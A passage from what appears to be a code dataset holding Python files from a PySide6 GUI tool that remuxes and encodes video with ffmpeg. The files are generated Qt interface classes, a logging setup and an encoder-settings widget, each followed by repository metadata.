u"\u6dfb\u52a0\u6587\u4ef6", None)) self.Vfilterinputclear.setText(QCoreApplication.translate("VfilterInterface", u"\u6e05\u9664", None)) self.Vfilteroutputfolder.setText(QCoreApplication.translate("VfilterInterface", u"\u9009\u62e9\u8f93\u51fa\u6587\u4ef6\u5939", None)) self.VcodecpIFTitle2_3.setText(QCoreApplication.translate("VfilterInterface", u"\u7f16\u7801\u8bbe\u7f6e(\u8bf7\u76f4\u63a5\u4ece\u6279\u5904\u7406\u9762\u677f\u590d\u5236\u81ea\u5b9a\u4e49\u7f16\u7801)", None)) self.VcodecpIFTitle2_2.setText(QCoreApplication.translate("VfilterInterface", u"\u6a2a\u7ad6\u5c4f\u8f6c\u6362", None)) self.Vfilterlabel_5.setText(QCoreApplication.translate("VfilterInterface", u"\u81ea\u5b9a\u4e49\u7f16\u7801", None)) self.VfilterplainTextEdit.setPlainText(QCoreApplication.translate("VfilterInterface", u"-vcodec libx264 -preset medium -crf 23 -acodec aac -b:a 256k", None)) self.VcodecpIFcheckBox_4.setText(QCoreApplication.translate("VfilterInterface", u"\u97f3\u9891\u6807\u51c6\u5316\u81f3-16LUFS", None)) self.VfilterlineEdit_3.setText(QCoreApplication.translate("VfilterInterface", u"x", None)) self.Vfilterlabel_8.setText(QCoreApplication.translate("VfilterInterface", u"\u6a2a\u7ad6\u5c4f\u8f6c\u6362\u76ee\u6807\u5206\u8fa8\u7387", None)) self.VfilterplainTextEdit_2.setPlainText(QCoreApplication.translate("VfilterInterface", u"\u6ee4\u955c\u53c2\u6570\uff1a", None)) self.VcodecpIFClearFil.setText(QCoreApplication.translate("VfilterInterface", u"\u6e05\u9664\u8bbe\u7f6e", None)) self.VcodecpIFcutsomFilter.setText(QCoreApplication.translate("VfilterInterface", u"\u6a2a\u7ad6\u5c4f\u8f6c\u6362", None)) self.Vfilterbgimg.setText(QCoreApplication.translate("VfilterInterface", u"\u6a2a\u7ad6\u5c4f\u8f6c\u6362\u80cc\u666f\u56fe", None)) # retranslateUi
18,840
Python
.py
290
56.241379
219
0.750947
wish2333/VideoExtractAndConcat
8
0
0
LGPL-2.1
9/5/2024, 10:48:43 PM (Europe/Amsterdam)
2,289,455
logger_config.py
wish2333_VideoExtractAndConcat/modules/logger_config.py
import logging import logging.handlers import os # 日志配置 logger = logging.getLogger(__name__) logger.setLevel(logging.DEBUG) if not os.path.exists(r'log'): os.mkdir(r'log') file_handler = logging.handlers.RotatingFileHandler(r'log/log.txt', mode='a', encoding='utf-8', maxBytes=1024 * 1024 * 5, backupCount=5) file_handler.setLevel(logging.DEBUG) file_handler.setFormatter(logging.Formatter('%(asctime)s-%(name)s-%(levelname)s - %(message)s')) console_handler = logging.StreamHandler() console_handler.setLevel(logging.INFO) console_handler.setFormatter(logging.Formatter('%(levelname)s - %(message)s')) logger.addHandler(file_handler) logger.addHandler(console_handler) logger.debug('\n')
706
Python
.py
17
39.529412
136
0.781065
wish2333/VideoExtractAndConcat
8
0
0
LGPL-2.1
9/5/2024, 10:48:43 PM (Europe/Amsterdam)
2,289,456
Ui_remuxInterface.py
wish2333_VideoExtractAndConcat/modules/Ui_remuxInterface.py
# -*- coding: utf-8 -*- ################################################################################ ## Form generated from reading UI file 'remuxInterface.ui' ## ## Created by: Qt User Interface Compiler version 6.7.0 ## ## WARNING! All changes made in this file will be lost when recompiling UI file! ################################################################################ from PySide6.QtCore import (QCoreApplication, QDate, QDateTime, QLocale, QMetaObject, QObject, QPoint, QRect, QSize, QTime, QUrl, Qt) from PySide6.QtGui import (QBrush, QColor, QConicalGradient, QCursor, QFont, QFontDatabase, QGradient, QIcon, QImage, QKeySequence, QLinearGradient, QPainter, QPalette, QPixmap, QRadialGradient, QTransform) from PySide6.QtWidgets import (QAbstractScrollArea, QApplication, QFrame, QGridLayout, QHBoxLayout, QLabel, QLayout, QListWidgetItem, QPushButton, QSizePolicy, QSpacerItem, QVBoxLayout, QWidget) from qfluentwidgets import (ComboBox, ListWidget, PrimaryPushButton, PushButton, ScrollArea) class Ui_remuxInterface(object): def setupUi(self, remuxInterface): if not remuxInterface.objectName(): remuxInterface.setObjectName(u"remuxInterface") remuxInterface.resize(1085, 642) remuxInterface.setMinimumSize(QSize(780, 0)) self.verticalLayout = QVBoxLayout(remuxInterface) self.verticalLayout.setObjectName(u"verticalLayout") self.remuxIFscrollArea = ScrollArea(remuxInterface) self.remuxIFscrollArea.setObjectName(u"remuxIFscrollArea") self.remuxIFscrollArea.setMinimumSize(QSize(760, 0)) self.remuxIFscrollArea.setFrameShape(QFrame.Shape.NoFrame) self.remuxIFscrollArea.setFrameShadow(QFrame.Shadow.Sunken) self.remuxIFscrollArea.setWidgetResizable(True) self.remuxIFfacescrollAreaWidgetContents = QWidget() self.remuxIFfacescrollAreaWidgetContents.setObjectName(u"remuxIFfacescrollAreaWidgetContents") self.remuxIFfacescrollAreaWidgetContents.setGeometry(QRect(0, 0, 1067, 624)) self.verticalLayout_3 = QVBoxLayout(self.remuxIFfacescrollAreaWidgetContents) self.verticalLayout_3.setObjectName(u"verticalLayout_3") self.remuxIFbox01 = QHBoxLayout() self.remuxIFbox01.setSpacing(20) self.remuxIFbox01.setObjectName(u"remuxIFbox01") self.remuxIFbox01.setSizeConstraint(QLayout.SizeConstraint.SetDefaultConstraint) self.remuxIFverticalLayout_4 = QVBoxLayout() self.remuxIFverticalLayout_4.setObjectName(u"remuxIFverticalLayout_4") self.remuxIFverticalLayout_4.setContentsMargins(-1, -1, 0, -1) self.remuxIFTitle1 = QLabel(self.remuxIFfacescrollAreaWidgetContents) self.remuxIFTitle1.setObjectName(u"remuxIFTitle1") sizePolicy = QSizePolicy(QSizePolicy.Policy.Maximum, QSizePolicy.Policy.Maximum) sizePolicy.setHorizontalStretch(0) sizePolicy.setVerticalStretch(0) sizePolicy.setHeightForWidth(self.remuxIFTitle1.sizePolicy().hasHeightForWidth()) self.remuxIFTitle1.setSizePolicy(sizePolicy) self.remuxIFTitle1.setMaximumSize(QSize(120, 64)) font = QFont() font.setPointSize(28) font.setBold(True) font.setKerning(True) self.remuxIFTitle1.setFont(font) self.remuxIFverticalLayout_4.addWidget(self.remuxIFTitle1) self.remuxIFTitle2 = QLabel(self.remuxIFfacescrollAreaWidgetContents) self.remuxIFTitle2.setObjectName(u"remuxIFTitle2") sizePolicy1 = QSizePolicy(QSizePolicy.Policy.Preferred, QSizePolicy.Policy.Maximum) sizePolicy1.setHorizontalStretch(0) sizePolicy1.setVerticalStretch(0) sizePolicy1.setHeightForWidth(self.remuxIFTitle2.sizePolicy().hasHeightForWidth()) self.remuxIFTitle2.setSizePolicy(sizePolicy1) self.remuxIFTitle2.setMaximumSize(QSize(100, 45)) font1 = QFont() font1.setPointSize(18) font1.setBold(True) font1.setKerning(True) self.remuxIFTitle2.setFont(font1) self.remuxIFverticalLayout_4.addWidget(self.remuxIFTitle2) self.remuxIFbox01.addLayout(self.remuxIFverticalLayout_4) self.remuxlabel = QLabel(self.remuxIFfacescrollAreaWidgetContents) self.remuxlabel.setObjectName(u"remuxlabel") self.remuxlabel.setMaximumSize(QSize(16777215, 80)) self.remuxIFbox01.addWidget(self.remuxlabel) self.remuxIFhorizontalSpacer = QSpacerItem(20, 10, QSizePolicy.Policy.Expanding, QSizePolicy.Policy.Minimum) self.remuxIFbox01.addItem(self.remuxIFhorizontalSpacer) self.remuxIFpushBtn = PrimaryPushButton(self.remuxIFfacescrollAreaWidgetContents) self.remuxIFpushBtn.setObjectName(u"remuxIFpushBtn") sizePolicy2 = QSizePolicy(QSizePolicy.Policy.Preferred, QSizePolicy.Policy.Fixed) sizePolicy2.setHorizontalStretch(0) sizePolicy2.setVerticalStretch(0) sizePolicy2.setHeightForWidth(self.remuxIFpushBtn.sizePolicy().hasHeightForWidth()) self.remuxIFpushBtn.setSizePolicy(sizePolicy2) self.remuxIFpushBtn.setMinimumSize(QSize(240, 60)) font2 = QFont() font2.setPointSize(16) font2.setBold(True) font2.setKerning(True) self.remuxIFpushBtn.setFont(font2) self.remuxIFpushBtn.setFlat(False) self.remuxIFbox01.addWidget(self.remuxIFpushBtn) self.remuxIFSTBtn = QPushButton(self.remuxIFfacescrollAreaWidgetContents) self.remuxIFSTBtn.setObjectName(u"remuxIFSTBtn") self.remuxIFSTBtn.setMinimumSize(QSize(120, 60)) font3 = QFont() font3.setPointSize(16) font3.setBold(True) self.remuxIFSTBtn.setFont(font3) self.remuxIFbox01.addWidget(self.remuxIFSTBtn) self.verticalLayout_3.addLayout(self.remuxIFbox01) self.remuxIFbox02 = QFrame(self.remuxIFfacescrollAreaWidgetContents) self.remuxIFbox02.setObjectName(u"remuxIFbox02") self.remuxIFbox02.setEnabled(True) sizePolicy3 = QSizePolicy(QSizePolicy.Policy.Preferred, QSizePolicy.Policy.Minimum) sizePolicy3.setHorizontalStretch(0) sizePolicy3.setVerticalStretch(0) sizePolicy3.setHeightForWidth(self.remuxIFbox02.sizePolicy().hasHeightForWidth()) self.remuxIFbox02.setSizePolicy(sizePolicy3) self.remuxIFbox02.setMinimumSize(QSize(480, 145)) self.remuxIFbox02.setMaximumSize(QSize(16777215, 240)) self.remuxIFbox02.setFrameShape(QFrame.Shape.StyledPanel) self.remuxIFbox02.setFrameShadow(QFrame.Shadow.Raised) self.gridLayout = QGridLayout(self.remuxIFbox02) self.gridLayout.setObjectName(u"gridLayout") self.remuxIFinputfile = PushButton(self.remuxIFbox02) self.remuxIFinputfile.setObjectName(u"remuxIFinputfile") font4 = QFont() font4.setPointSize(12) font4.setBold(True) self.remuxIFinputfile.setFont(font4) self.gridLayout.addWidget(self.remuxIFinputfile, 0, 0, 1, 1) self.remuxIFoutputfolder = QPushButton(self.remuxIFbox02) self.remuxIFoutputfolder.setObjectName(u"remuxIFoutputfolder") self.remuxIFoutputfolder.setFont(font4) self.gridLayout.addWidget(self.remuxIFoutputfolder, 0, 2, 1, 1) self.remuxIFinputclear = PushButton(self.remuxIFbox02) self.remuxIFinputclear.setObjectName(u"remuxIFinputclear") self.remuxIFinputclear.setFont(font4) self.gridLayout.addWidget(self.remuxIFinputclear, 0, 1, 1, 1) self.remuxIFinputlist = ListWidget(self.remuxIFbox02) self.remuxIFinputlist.setObjectName(u"remuxIFinputlist") sizePolicy4 = QSizePolicy(QSizePolicy.Policy.Preferred, QSizePolicy.Policy.Preferred) sizePolicy4.setHorizontalStretch(0) sizePolicy4.setVerticalStretch(0) sizePolicy4.setHeightForWidth(self.remuxIFinputlist.sizePolicy().hasHeightForWidth()) self.remuxIFinputlist.setSizePolicy(sizePolicy4) self.remuxIFinputlist.setMinimumSize(QSize(0, 120)) self.remuxIFinputlist.setMaximumSize(QSize(16777215, 200)) self.remuxIFinputlist.setAcceptDrops(True) self.remuxIFinputlist.setVerticalScrollBarPolicy(Qt.ScrollBarPolicy.ScrollBarAlwaysOn) self.remuxIFinputlist.setHorizontalScrollBarPolicy(Qt.ScrollBarPolicy.ScrollBarAsNeeded) self.remuxIFinputlist.setSizeAdjustPolicy(QAbstractScrollArea.SizeAdjustPolicy.AdjustIgnored) self.remuxIFinputlist.setDragEnabled(False) self.gridLayout.addWidget(self.remuxIFinputlist, 1, 0, 1, 3) self.verticalLayout_3.addWidget(self.remuxIFbox02) self.remuxIFbox04 = QHBoxLayout() self.remuxIFbox04.setObjectName(u"remuxIFbox04") self.remuxframe = QFrame(self.remuxIFfacescrollAreaWidgetContents) self.remuxframe.setObjectName(u"remuxframe") self.remuxframe.setFrameShape(QFrame.Shape.StyledPanel) self.remuxframe.setFrameShadow(QFrame.Shadow.Raised) self.verticalLayout_2 = QVBoxLayout(self.remuxframe) self.verticalLayout_2.setObjectName(u"verticalLayout_2") self.remuxhorizontalLayout = QHBoxLayout() self.remuxhorizontalLayout.setObjectName(u"remuxhorizontalLayout") self.remuxhorizontalLayout.setContentsMargins(-1, -1, -1, 10) self.remuxcomboBox = ComboBox(self.remuxframe) self.remuxcomboBox.addItem("") self.remuxcomboBox.addItem("") self.remuxcomboBox.addItem("") self.remuxcomboBox.addItem("") self.remuxcomboBox.setObjectName(u"remuxcomboBox") self.remuxcomboBox.setMinimumSize(QSize(0, 30)) font5 = QFont() font5.setPointSize(12) self.remuxcomboBox.setFont(font5) self.remuxhorizontalLayout.addWidget(self.remuxcomboBox) self.remuxpushButton = PushButton(self.remuxframe) self.remuxpushButton.setObjectName(u"remuxpushButton") self.remuxpushButton.setMinimumSize(QSize(0, 30)) self.remuxpushButton.setFont(font5) self.remuxhorizontalLayout.addWidget(self.remuxpushButton) self.verticalLayout_2.addLayout(self.remuxhorizontalLayout) self.remuxhorizontalLayout_2 = QHBoxLayout() self.remuxhorizontalLayout_2.setObjectName(u"remuxhorizontalLayout_2") self.remuxhorizontalLayout_2.setContentsMargins(-1, -1, -1, 10) self.remuxpushButton_2 = PushButton(self.remuxframe) self.remuxpushButton_2.setObjectName(u"remuxpushButton_2") self.remuxpushButton_2.setMinimumSize(QSize(0, 30)) self.remuxpushButton_2.setFont(font5) self.remuxhorizontalLayout_2.addWidget(self.remuxpushButton_2) self.remuxpushButton_3 = PushButton(self.remuxframe) self.remuxpushButton_3.setObjectName(u"remuxpushButton_3") self.remuxpushButton_3.setMinimumSize(QSize(0, 30)) self.remuxpushButton_3.setFont(font5) self.remuxhorizontalLayout_2.addWidget(self.remuxpushButton_3) self.remuxpushButton_5 = PushButton(self.remuxframe) self.remuxpushButton_5.setObjectName(u"remuxpushButton_5") self.remuxpushButton_5.setMinimumSize(QSize(0, 30)) self.remuxpushButton_5.setFont(font5) self.remuxhorizontalLayout_2.addWidget(self.remuxpushButton_5) self.verticalLayout_2.addLayout(self.remuxhorizontalLayout_2) self.remuxhorizontalLayout_3 = QHBoxLayout() self.remuxhorizontalLayout_3.setObjectName(u"remuxhorizontalLayout_3") self.remuxhorizontalLayout_3.setContentsMargins(-1, -1, -1, 10) self.remuxpushButton_6 = PushButton(self.remuxframe) self.remuxpushButton_6.setObjectName(u"remuxpushButton_6") self.remuxpushButton_6.setMinimumSize(QSize(0, 30)) self.remuxpushButton_6.setFont(font5) self.remuxhorizontalLayout_3.addWidget(self.remuxpushButton_6) self.remuxpushButton_4 = PushButton(self.remuxframe) self.remuxpushButton_4.setObjectName(u"remuxpushButton_4") self.remuxpushButton_4.setMinimumSize(QSize(0, 30)) self.remuxpushButton_4.setFont(font5) self.remuxhorizontalLayout_3.addWidget(self.remuxpushButton_4) self.remuxpushButton_7 = PushButton(self.remuxframe) self.remuxpushButton_7.setObjectName(u"remuxpushButton_7") self.remuxpushButton_7.setMinimumSize(QSize(0, 30)) self.remuxpushButton_7.setFont(font5) self.remuxhorizontalLayout_3.addWidget(self.remuxpushButton_7) self.verticalLayout_2.addLayout(self.remuxhorizontalLayout_3) self.remuxhorizontalLayout_4 = QHBoxLayout() self.remuxhorizontalLayout_4.setObjectName(u"remuxhorizontalLayout_4") self.remuxhorizontalLayout_4.setContentsMargins(-1, -1, -1, 10) self.remuxpushButton_10 = PushButton(self.remuxframe) self.remuxpushButton_10.setObjectName(u"remuxpushButton_10") self.remuxpushButton_10.setMinimumSize(QSize(0, 30)) self.remuxpushButton_10.setFont(font5) self.remuxhorizontalLayout_4.addWidget(self.remuxpushButton_10) self.remuxpushButton_8 = PushButton(self.remuxframe) self.remuxpushButton_8.setObjectName(u"remuxpushButton_8") self.remuxpushButton_8.setMinimumSize(QSize(0, 30)) self.remuxpushButton_8.setFont(font5) self.remuxhorizontalLayout_4.addWidget(self.remuxpushButton_8) self.remuxpushButton_9 = PushButton(self.remuxframe) self.remuxpushButton_9.setObjectName(u"remuxpushButton_9") self.remuxpushButton_9.setMinimumSize(QSize(0, 30)) self.remuxpushButton_9.setFont(font5) self.remuxhorizontalLayout_4.addWidget(self.remuxpushButton_9) self.verticalLayout_2.addLayout(self.remuxhorizontalLayout_4) self.remuxIFbox04.addWidget(self.remuxframe) self.verticalLayout_3.addLayout(self.remuxIFbox04) self.remuxIFscrollArea.setWidget(self.remuxIFfacescrollAreaWidgetContents) self.verticalLayout.addWidget(self.remuxIFscrollArea) self.retranslateUi(remuxInterface) self.remuxIFpushBtn.setDefault(True) QMetaObject.connectSlotsByName(remuxInterface) # setupUi def retranslateUi(self, remuxInterface): remuxInterface.setWindowTitle(QCoreApplication.translate("remuxInterface", u"Form", None)) self.remuxIFTitle1.setText(QCoreApplication.translate("remuxInterface", u"\u8f6c\u5c01\u88c5", None)) self.remuxIFTitle2.setText(QCoreApplication.translate("remuxInterface", u"\u89c6\u9891", None)) self.remuxlabel.setText(QCoreApplication.translate("remuxInterface", u"\u4e0d\u91cd\u65b0\u7f16\u7801\u7684\u64cd\u4f5c", None)) self.remuxIFpushBtn.setText(QCoreApplication.translate("remuxInterface", u"\u5904\u7406\u89c6\u9891", None)) self.remuxIFSTBtn.setText(QCoreApplication.translate("remuxInterface", u"\u4e2d\u6b62\u5904\u7406", None)) self.remuxIFinputfile.setText(QCoreApplication.translate("remuxInterface", u"\u6dfb\u52a0\u6587\u4ef6", None)) self.remuxIFoutputfolder.setText(QCoreApplication.translate("remuxInterface", u"\u9009\u62e9\u8f93\u51fa\u6587\u4ef6\u5939", None)) self.remuxIFinputclear.setText(QCoreApplication.translate("remuxInterface", u"\u6e05\u9664", None)) self.remuxcomboBox.setItemText(0, QCoreApplication.translate("remuxInterface", u"mp4", None)) self.remuxcomboBox.setItemText(1, QCoreApplication.translate("remuxInterface", u"mkv", None)) self.remuxcomboBox.setItemText(2, QCoreApplication.translate("remuxInterface", u"flv", None)) self.remuxcomboBox.setItemText(3, QCoreApplication.translate("remuxInterface", u"mov", None)) self.remuxpushButton.setText(QCoreApplication.translate("remuxInterface", u"\u8f6c\u5c01\u88c5", None)) self.remuxpushButton_2.setText(QCoreApplication.translate("remuxInterface", u"\u5e38\u89c4\u63d0\u53d6\u89c6\u9891", None)) self.remuxpushButton_3.setText(QCoreApplication.translate("remuxInterface", u"\u5e38\u89c4\u63d0\u53d6\u97f3\u9891", None)) self.remuxpushButton_5.setText(QCoreApplication.translate("remuxInterface", u"\u591a\u8f68\u63d0\u53d6\u89c6\u9891\u8f68", None)) self.remuxpushButton_6.setText(QCoreApplication.translate("remuxInterface", u"\u591a\u8f68\u63d0\u53d6\u97f3\u98911", None)) self.remuxpushButton_4.setText(QCoreApplication.translate("remuxInterface", u"\u591a\u8f68\u63d0\u53d6\u97f3\u98912", None)) self.remuxpushButton_7.setText(QCoreApplication.translate("remuxInterface", u"\u591a\u8f68\u63d0\u53d6\u97f3\u98913", None)) self.remuxpushButton_10.setText(QCoreApplication.translate("remuxInterface", u"\u591a\u8f68\u63d0\u53d6\u97f3\u98914", None)) self.remuxpushButton_8.setText(QCoreApplication.translate("remuxInterface", u"\u591a\u8f68\u63d0\u53d6\u5b57\u5e551", None)) self.remuxpushButton_9.setText(QCoreApplication.translate("remuxInterface", u"\u591a\u8f68\u63d0\u53d6\u5b57\u5e552", None)) # retranslateUi
17,046
Python
.py
269
54.66171
139
0.746887
wish2333/VideoExtractAndConcat
8
0
0
LGPL-2.1
9/5/2024, 10:48:43 PM (Europe/Amsterdam)
2,289,457
vcodec_Interface.py
wish2333_VideoExtractAndConcat/modules/vcodec_Interface.py
from modules.logger_config import logger import os from PySide6.QtCore import Qt, QThread, Signal, QObject from PySide6.QtGui import QPixmap, QPainter, QColor from PySide6.QtWidgets import QWidget, QFileDialog, QMessageBox from qfluentwidgets import MessageBox from modules.config import ffpath from modules.ffmpegApi import FFmpeg from modules.Ui_vcodecInterfacee import Ui_VcodecInterfacee # 打印初始化ffmpeg路径为: # logger.info(f"初始化ffmpeg路径为:{ffpath.ffmpeg_path}") # logger.info(f"初始化ffprobe路径为:{ffpath.ffprobe_path}") # 继承自QObject的子类,用于执行后台任务的子类 class Worker(QObject): finished = Signal() # 任务完成时发出的信号 def __init__(self, task_type, ffmpeg_path, ffprobe_path, *task_args): super().__init__() self.task_type = task_type self.ffmpeg_path = ffmpeg_path self.ffprobe_path = ffprobe_path self.task_args = task_args def run_ffmpeg_task(self): if self.task_type == 'extract_video': self.extract_video(*self.task_args) elif self.task_type == 'audio_encode': self.audio_encode(*self.task_args) elif self.task_type == 'video_encode': self.video_encode(*self.task_args) elif self.task_type == 'avsmix_encode': self.avsmix_encode(*self.task_args) self.finished.emit() # 任务完成,发出信号 # 在这里可以添加更多任务类型的判断和调用 def extract_video(self, input_folder, output_folder, start_time, end_time, encoder, overwrite='-y'): ffmpeg_instance = FFmpeg(self.ffmpeg_path) # 实例化FFmpegApi ffmpeg_instance.extract_video_single(input_folder, output_folder, start_time, end_time, encoder, overwrite) def audio_encode(self, input_file, output_file, encoder, overwrite='-y'): ffmpeg_instance = FFmpeg(self.ffmpeg_path) # 实例化FFmpegApi ffmpeg_instance.audio_encode(input_file, output_file, encoder, overwrite) def video_encode(self, input_file, output_file, encoder, overwrite='-y'): ffmpeg_instance = FFmpeg(self.ffmpeg_path) # 实例化FFmpegApi ffmpeg_instance.video_encode(input_file, output_file, encoder, overwrite) def avsmix_encode(self, input_file, output_file, audio, subtitle, encoder, overwrite='-y'): ffmpeg_instance = FFmpeg(self.ffmpeg_path) # 实例化FFmpegApi ffmpeg_instance.avsmix_encode(input_file, output_file, audio, subtitle, encoder, overwrite) # 继承自QThread的子类,用于后台执行任务的线程类 class WorkerThread(QThread): def __init__(self, worker): super().__init__() self.worker = worker def run(self): self.worker.run_ffmpeg_task() class VcodecInterface(QWidget, Ui_VcodecInterfacee): def __init__(self, parent=None): super().__init__(parent=parent) self.setupUi(self) self.init_variables() self.init_action() self.init_print() self.bind() # Custom_encoder def change_custom_encoder(self, vcodec, vpreset, resolution, fps, acodec, apreset,): custom_encoder = f'{vcodec}{vpreset}{resolution}{fps}{acodec}{apreset}' return custom_encoder # Init_variables def init_variables(self): # file self.input_file_path = '' self.output_file_path = '' self.audio_file_path = '' self.subtitle_file_path = '' # encoding self.custom_encoder = '' self.vcodec = '-vcodec libx264 ' self.vpreset ='-preset medium -crf 23 ' self.resolution = '' self.fps = '' self.acodec = '-acodec aac ' self.apreset ='-b:a 128k ' self.bitrate = '800000' self.quality = '23' # Init_action def init_action(self): self.lineEdit.setReadOnly(True) # 禁止修改分辨率 self.lineEdit_2.setReadOnly(True) # 禁止修改帧率 self.comboBox_5.setEnabled(False) # 禁止修改profile # Init_print def init_print(self): logger.debug("VideoCodecInterface is initialized!") # Welcome message self.console.appendPlainText("欢迎使用FFmpeg-python视频处理工具!") # encoder self.custom_encoder = self.change_custom_encoder(self.vcodec, self.vpreset, self.resolution, self.fps, self.acodec, self.apreset) self.plainTextEdit.setPlainText(self.custom_encoder) # 判断ffmpeg文件是否存在 if not (os.path.isfile(ffpath.ffmpeg_path) and os.path.isfile(ffpath.ffprobe_path)): self.console.appendPlainText("ffmpeg路径或ffprobe路径错误,请检查!") logger.error("ffmpeg or ffprobe error, please check the path!") # else: # self.console.appendPlainText(f"ffmpeg初始化:{ffpath.ffmpeg_path}") # self.console.appendPlainText(f"ffprobe初始化:{ffpath.ffprobe_path}") # logger.info(f"ffmpeg and ffprobe initialized successfully!") # Bind Event def bind(self): # Bind Button Event self.fileBtn_1.clicked.connect(self.open_file_1) # inout self.fileBtn_2.clicked.connect(self.open_file_2) # output self.fileBtn_3.clicked.connect(self.open_file_3) # audio self.fileBtn_4.clicked.connect(self.open_file_4) # subtitle self.pushBtn.clicked.connect(self.encoding) # encoding # Checkbox Event self.checkBox_2.stateChanged.connect(self.enable_resolution) # resolution self.checkBox_3.stateChanged.connect(self.enable_fps) # fps self.checkBox.stateChanged.connect(self.enable_profile) # profile # Combobox Event self.comboBox.currentTextChanged.connect(self.change_vcodec) # vcodec self.comboBox_2.currentTextChanged.connect(self.change_vpreset) # vpreset self.comboBox_4.currentTextChanged.connect(self.change_acodec) # acodec self.comboBox_3.currentTextChanged.connect(self.change_apreset) # apreset self.comboBox_5.currentTextChanged.connect(self.change_profile) # profile self.spinBox.valueChanged.connect(self.change_bitrate) # bitrate self.spinBox_2.valueChanged.connect(self.change_quality) # quality # lineEdit Event self.lineEdit.textChanged.connect(self.change_resolution) # resolution self.lineEdit_2.textChanged.connect(self.change_fps) # fps # open_file_1:input def open_file_1(self): self.input_file_path, _ = QFileDialog.getOpenFileName(self, "选择输入文件", "", "视频文件 (*)") if self.input_file_path: self.lineEdit1.setText(self.input_file_path) # open_file_2:output def open_file_2(self): if self.lineEdit1.text() != '': output_file_path, _ = QFileDialog.getSaveFileName(self, "选择输出文件", f"{self.input_file_path}", "视频文件 (*)") if output_file_path: self.lineEdit2.setText(output_file_path) else: # QMessageBox.information(self, "警告", "请先选择输入文件!", QMessageBox.Yes) w = MessageBox("警告", "请先选择输入文件!", parent=self) if w.exec(): logger.info('确认,关闭警告窗口') else: logger.info('取消,关闭警告窗口') # open_file_3:audio def open_file_3(self): self.audio_file_path, _ = QFileDialog.getOpenFileName(self, "选择音频文件", "", "音频文件 (*.aac *.flac *.mp3 *.m4a *.wav *.wma *.ogg *.opus *.alac)") if self.audio_file_path: self.lineEdit3.setText(self.audio_file_path) # open_file_4:subtitle def open_file_4(self): if self.lineEdit1.text() != '': self.subtitle_file_path, _ = QFileDialog.getOpenFileName(self, "选择字幕文件", "", "字幕文件 (*.srt *.ass)") if self.subtitle_file_path: self.lineEdit4.setText(self.subtitle_file_path) else: # QMessageBox.information(self, "警告", "请先选择输入文件!", QMessageBox.Yes) w = MessageBox("警告", "请先选择输入文件!", parent=self) if w.exec(): logger.info('确认,关闭警告窗口') else: logger.info('取消,关闭警告窗口') # Custom encoding Config def enable_resolution(self): if self.checkBox_2.isChecked(): self.lineEdit.setReadOnly(False) # 允许修改分辨率 self.resolution = f'-s {self.lineEdit.text()} ' # 结尾要有空格 self.custom_encoder = self.change_custom_encoder(self.vcodec, self.vpreset, self.resolution, self.fps, self.acodec, self.apreset) self.plainTextEdit.setPlainText(self.custom_encoder) else: self.lineEdit.setReadOnly(True) # 禁止修改分辨率 self.resolution = '' self.custom_encoder = self.change_custom_encoder(self.vcodec, self.vpreset, self.resolution, self.fps, self.acodec, self.apreset) self.plainTextEdit.setPlainText(self.custom_encoder) def change_resolution(self): if self.checkBox_2.isChecked(): self.resolution = f'-s {self.lineEdit.text()} ' # 结尾要有空格 self.custom_encoder = self.change_custom_encoder(self.vcodec, self.vpreset, self.resolution, self.fps, self.acodec, self.apreset) self.plainTextEdit.setPlainText(self.custom_encoder) def enable_fps(self): if self.checkBox_3.isChecked(): self.lineEdit_2.setReadOnly(False) # 允许修改帧率 self.fps = f'-r {self.lineEdit_2.text()} ' # 结尾要有空格 self.custom_encoder = self.change_custom_encoder(self.vcodec, self.vpreset, self.resolution, self.fps, self.acodec, self.apreset) self.plainTextEdit.setPlainText(self.custom_encoder) else: self.lineEdit_2.setReadOnly(True) # 禁止修改帧率 self.fps = '' self.custom_encoder = self.change_custom_encoder(self.vcodec, self.vpreset, self.resolution, self.fps, self.acodec, self.apreset) self.plainTextEdit.setPlainText(self.custom_encoder) def change_fps(self): if self.checkBox_3.isChecked(): self.fps = f'-r {self.lineEdit_2.text()} ' # 结尾要有空格 self.custom_encoder = self.change_custom_encoder(self.vcodec, self.vpreset, self.resolution, self.fps, self.acodec, self.apreset) self.plainTextEdit.setPlainText(self.custom_encoder) def change_vcodec(self): if not self.comboBox.currentText() == 'copy': self.vcodec = f'-vcodec {self.comboBox.currentText()} ' # 结尾要有空格 else: self.vcodec = '-vcodec copy ' self.vpreset = '' self.custom_encoder = self.change_custom_encoder(self.vcodec, self.vpreset, self.resolution, self.fps, self.acodec, self.apreset) self.plainTextEdit.setPlainText(self.custom_encoder) def change_vpreset(self): self.quality = self.spinBox_2.value() self.bitrate = self.spinBox.value() * 1000 if self.comboBox_2.currentText() == 'CRF品质-medium' or self.comboBox_2.currentText() == 'CRF品质-fast' or self.comboBox_2.currentText() == 'CQP硬编品质(*qsv)': self.change_vpreset_sub(self.quality) else: self.change_vpreset_sub(self.bitrate) def change_vpreset_sub(self, rate): if self.comboBox_2.currentText() == 'CRF品质-medium': self.vpreset = f'-preset medium -crf {rate} ' elif self.comboBox_2.currentText() == 'CRF品质-fast': self.vpreset = f'-preset fast -crf {rate} ' elif self.comboBox_2.currentText() == 'CBR平均码率-medium': self.vpreset = f'-preset medium -b:v {rate} ' elif self.comboBox_2.currentText() == 'CBR平均码率-fast': self.vpreset = f'-preset fast -b:v {rate} ' elif self.comboBox_2.currentText() == 'CQP硬编品质(*qsv)': self.vpreset = f'-preset medium -qp {rate} ' self.custom_encoder = self.change_custom_encoder(self.vcodec, self.vpreset, self.resolution, self.fps, self.acodec, self.apreset) self.plainTextEdit.setPlainText(self.custom_encoder) def change_bitrate(self): if self.comboBox_2.currentText() == 'CBR平均码率-medium' or self.comboBox_2.currentText() == 'CBR平均码率-fast': self.bitrate = self.spinBox.value() * 1000 self.change_vpreset_sub(self.bitrate) def change_quality(self): if self.comboBox_2.currentText() == 'CRF品质-medium' or self.comboBox_2.currentText() == 'CRF品质-fast' or self.comboBox_2.currentText() == 'CQP硬编品质(*qsv)': self.quality = self.spinBox_2.value() self.change_vpreset_sub(self.quality) def change_acodec(self): if not self.comboBox_4.currentText() == 'copy': self.acodec = f'-acodec {self.comboBox_4.currentText()} ' # 结尾要有空格 else: self.acodec = '-acodec copy ' self.apreset = '' self.custom_encoder = self.change_custom_encoder(self.vcodec, self.vpreset, self.resolution, self.fps, self.acodec, self.apreset) self.plainTextEdit.setPlainText(self.custom_encoder) def change_apreset(self): self.apreset = f'-b:a {self.comboBox_3.currentText()} ' # 结尾要有空格 self.custom_encoder = self.change_custom_encoder(self.vcodec, self.vpreset, self.resolution, self.fps, self.acodec, self.apreset) 